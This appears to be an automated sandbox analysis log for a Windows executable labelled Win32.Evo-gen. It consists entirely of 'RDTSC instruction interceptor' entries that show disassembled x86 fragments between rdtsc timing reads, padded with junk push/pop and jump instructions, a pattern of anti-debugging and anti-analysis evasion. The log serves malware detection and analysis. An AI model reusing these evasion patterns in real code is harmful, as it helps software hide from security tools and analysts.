                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: FF4500 second address: FF454C instructions: 0x00000000 rdtsc 0x00000002 jc 00007F449CEB0738h 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c add dword ptr [esp], 67B378D4h 0x00000013 js 00007F449CEB073Eh 0x00000019 push esi 0x0000001a mov edi, dword ptr [ebp+122D3E28h] 0x00000020 pop edx 0x00000021 push 00000003h 0x00000023 jmp 00007F449CEB073Dh 0x00000028 push 00000000h 0x0000002a mov dx, 9128h 0x0000002e push 00000003h 0x00000030 add dh, FFFFFFD2h 0x00000033 push 8F6B59D9h 0x00000038 pushad 0x00000039 jns 00007F449CEB0738h 0x0000003f pushad 0x00000040 push eax 0x00000041 push edx 0x00000042 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: FF454C second address: FF4552 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: FF4552 second address: FF457E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 xor dword ptr [esp], 4F6B59D9h 0x0000000d mov dword ptr [ebp+122D1CBEh], ebx 0x00000013 lea ebx, dword ptr [ebp+124491EEh] 0x00000019 mov si, 644Dh 0x0000001d push eax 0x0000001e push eax 0x0000001f push edx 0x00000020 jbe 00007F449CEB073Ch 0x00000026 jnl 00007F449CEB0736h 0x0000002c rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: FF457E second address: FF4588 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jg 00007F449CC63D76h 0x0000000a rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: FF4588 second address: FF458C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: FF467A second address: FF467E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 10156B5 second address: 10156B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 10156B9 second address: 10156C7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jo 00007F449CC63D76h 0x0000000e rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 10156C7 second address: 10156CD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 10156CD second address: 10156F8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F449CC63D7Fh 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F449CC63D86h 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 10156F8 second address: 101570A instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F449CEB0736h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push ecx 0x0000000e pushad 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: FE710C second address: FE712E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F449CC63D88h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: FE712E second address: FE7134 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: FE7134 second address: FE7138 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 1013640 second address: 101364A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F449CEB0736h 0x0000000a rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 10137AB second address: 10137B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 10137B0 second address: 10137B5 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 1013D5C second address: 1013D60 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 1013D60 second address: 1013D86 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 pop eax 0x00000009 pushad 0x0000000a popad 0x0000000b push edx 0x0000000c pop edx 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F449CEB0740h 0x00000015 jc 00007F449CEB0736h 0x0000001b rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 1013D86 second address: 1013D90 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F449CC63D76h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 1013D90 second address: 1013DA2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push esi 0x0000000a pushad 0x0000000b popad 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e pop esi 0x0000000f push ebx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 1013DA2 second address: 1013DA7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 1013DA7 second address: 1013DB3 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F449CEB073Eh 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 1014211 second address: 101421A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 101421A second address: 1014224 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F449CEB0736h 0x0000000a rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 1014224 second address: 1014247 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 pushad 0x00000008 jmp 00007F449CC63D88h 0x0000000d push esi 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 101439C second address: 10143A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edi 0x00000007 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 101452B second address: 1014546 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F449CC63D86h 0x00000009 pop ebx 0x0000000a rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 10147F4 second address: 1014816 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F449CEB0741h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c jns 00007F449CEB0736h 0x00000012 push eax 0x00000013 pop eax 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 1007C9E second address: 1007CA4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 1007CA4 second address: 1007CA8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 1007CA8 second address: 1007CC8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F449CC63D7Ch 0x0000000c jmp 00007F449CC63D7Ah 0x00000011 push edi 0x00000012 pop edi 0x00000013 popad 0x00000014 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 1007CC8 second address: 1007CD4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 je 00007F449CEB0736h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 1007CD4 second address: 1007CD8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 1007CD8 second address: 1007CFD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnc 00007F449CEB073Eh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push edx 0x0000000f jmp 00007F449CEB073Ah 0x00000014 push eax 0x00000015 push edx 0x00000016 push ebx 0x00000017 pop ebx 0x00000018 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: FE1EF2 second address: FE1F2A instructions: 0x00000000 rdtsc 0x00000002 jc 00007F449CC63D92h 0x00000008 jmp 00007F449CC63D86h 0x0000000d jnl 00007F449CC63D76h 0x00000013 pop edx 0x00000014 pop eax 0x00000015 push esi 0x00000016 jmp 00007F449CC63D7Dh 0x0000001b push eax 0x0000001c push edx 0x0000001d pushad 0x0000001e popad 0x0000001f rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 101495B second address: 1014964 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 1014964 second address: 1014979 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F449CC63D76h 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d js 00007F449CC63D76h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 101558B second address: 101558F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 1020758 second address: 102075E instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 102075E second address: 1020765 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 10212EE second address: 102130B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F449CC63D89h 0x00000009 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 102130B second address: 102130F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 1021FD8 second address: 1021FDE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 1022094 second address: 1022098 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 1022098 second address: 102209E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 10222E7 second address: 10222EC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 10222EC second address: 10222F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 102238B second address: 1022390 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 1022390 second address: 10223A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d jnc 00007F449CC63D76h 0x00000013 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 102245F second address: 1022464 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 10228A7 second address: 1022936 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F449CC63D7Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007F449CC63D7Bh 0x0000000f nop 0x00000010 mov esi, dword ptr [ebp+122D3D40h] 0x00000016 push 00000000h 0x00000018 push 00000000h 0x0000001a push ebp 0x0000001b call 00007F449CC63D78h 0x00000020 pop ebp 0x00000021 mov dword ptr [esp+04h], ebp 0x00000025 add dword ptr [esp+04h], 00000015h 0x0000002d inc ebp 0x0000002e push ebp 0x0000002f ret 0x00000030 pop ebp 0x00000031 ret 0x00000032 jmp 00007F449CC63D7Ch 0x00000037 mov esi, dword ptr [ebp+122D3D94h] 0x0000003d push 00000000h 0x0000003f push 00000000h 0x00000041 push edi 0x00000042 call 00007F449CC63D78h 0x00000047 pop edi 0x00000048 mov dword ptr [esp+04h], edi 0x0000004c add dword ptr [esp+04h], 00000015h 0x00000054 inc edi 0x00000055 push edi 0x00000056 ret 0x00000057 pop edi 0x00000058 ret 0x00000059 xchg eax, ebx 0x0000005a push edx 0x0000005b pushad 0x0000005c jmp 00007F449CC63D87h 0x00000061 push eax 0x00000062 push edx 0x00000063 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 1023351 second address: 1023356 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 1023BE3 second address: 1023BE9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 1023BE9 second address: 1023BED instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 1024EE9 second address: 1024EF1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push edx 0x00000007 pop edx 0x00000008 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 102DEE3 second address: 102DF6B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F449CEB0740h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebx 0x0000000a nop 0x0000000b push 00000000h 0x0000000d push edi 0x0000000e call 00007F449CEB0738h 0x00000013 pop edi 0x00000014 mov dword ptr [esp+04h], edi 0x00000018 add dword ptr [esp+04h], 00000015h 0x00000020 inc edi 0x00000021 push edi 0x00000022 ret 0x00000023 pop edi 0x00000024 ret 0x00000025 pushad 0x00000026 mov dword ptr [ebp+122D3A40h], esi 0x0000002c mov dword ptr [ebp+1246D87Fh], edi 0x00000032 popad 0x00000033 push 00000000h 0x00000035 push 00000000h 0x00000037 push ebx 0x00000038 call 00007F449CEB0738h 0x0000003d pop ebx 0x0000003e mov dword ptr [esp+04h], ebx 0x00000042 add dword ptr [esp+04h], 00000014h 0x0000004a inc ebx 0x0000004b push ebx 0x0000004c ret 0x0000004d pop ebx 0x0000004e ret 0x0000004f push 00000000h 0x00000051 mov bx, ax 0x00000054 xchg eax, esi 0x00000055 jng 00007F449CEB074Ah 0x0000005b push edx 0x0000005c jmp 00007F449CEB0742h 0x00000061 pop edx 0x00000062 push eax 0x00000063 push eax 0x00000064 push edx 0x00000065 pushad 0x00000066 pushad 0x00000067 popad 0x00000068 push edx 0x00000069 pop edx 0x0000006a popad 0x0000006b rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 102C1A7 second address: 102C220 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F449CC63D7Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a nop 0x0000000b mov edi, 07DDC089h 0x00000010 stc 0x00000011 push dword ptr fs:[00000000h] 0x00000018 mov edi, dword ptr [ebp+122D1DB8h] 0x0000001e mov dword ptr fs:[00000000h], esp 0x00000025 mov edi, dword ptr [ebp+122D3C60h] 0x0000002b mov eax, dword ptr [ebp+122D102Dh] 0x00000031 jmp 00007F449CC63D88h 0x00000036 push FFFFFFFFh 0x00000038 push 00000000h 0x0000003a push ebx 0x0000003b call 00007F449CC63D78h 0x00000040 pop ebx 0x00000041 mov dword ptr [esp+04h], ebx 0x00000045 add dword ptr [esp+04h], 00000016h 0x0000004d inc ebx 0x0000004e push ebx 0x0000004f ret 0x00000050 pop ebx 0x00000051 ret 0x00000052 nop 0x00000053 pushad 0x00000054 push eax 0x00000055 push edx 0x00000056 push edx 0x00000057 pop edx 0x00000058 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 102C220 second address: 102C22D instructions: 0x00000000 rdtsc 0x00000002 jp 00007F449CEB0736h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push esi 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 10300E8 second address: 10300ED instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 102F2C8 second address: 102F2D6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 push eax 0x00000008 push esi 0x00000009 pushad 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 1031274 second address: 10312A5 instructions: 0x00000000 rdtsc 0x00000002 je 00007F449CC63D76h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d mov edi, dword ptr [ebp+122D3BB4h] 0x00000013 push 00000000h 0x00000015 mov ebx, dword ptr [ebp+122D3CB4h] 0x0000001b mov dword ptr [ebp+122D1D1Fh], edx 0x00000021 push 00000000h 0x00000023 add dword ptr [ebp+122D2A69h], eax 0x00000029 push eax 0x0000002a push eax 0x0000002b push edx 0x0000002c pushad 0x0000002d pushad 0x0000002e popad 0x0000002f push eax 0x00000030 push edx 0x00000031 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 10312A5 second address: 10312AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 10312AA second address: 10312C0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F449CC63D82h 0x00000009 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 1030375 second address: 1030385 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 popad 0x00000006 push eax 0x00000007 pushad 0x00000008 push esi 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b pop esi 0x0000000c push eax 0x0000000d push edx 0x0000000e push edx 0x0000000f pop edx 0x00000010 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 103336A second address: 1033370 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 103246F second address: 1032473 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 1033370 second address: 103337A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 pushad 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 103337A second address: 1033386 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pushad 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 1034278 second address: 103427E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 10335B2 second address: 10335C5 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pushad 0x00000004 popad 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d jnl 00007F449CEB0736h 0x00000013 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 10335C5 second address: 10335CB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 103838E second address: 10383CF instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 mov dword ptr [ebp+122D367Eh], ebx 0x0000000f push 00000000h 0x00000011 mov ebx, 16405702h 0x00000016 push 00000000h 0x00000018 push 00000000h 0x0000001a push edi 0x0000001b call 00007F449CEB0738h 0x00000020 pop edi 0x00000021 mov dword ptr [esp+04h], edi 0x00000025 add dword ptr [esp+04h], 00000014h 0x0000002d inc edi 0x0000002e push edi 0x0000002f ret 0x00000030 pop edi 0x00000031 ret 0x00000032 push eax 0x00000033 push eax 0x00000034 push edx 0x00000035 pushad 0x00000036 pushad 0x00000037 popad 0x00000038 jg 00007F449CEB0736h 0x0000003e popad 0x0000003f rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 1035562 second address: 1035568 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
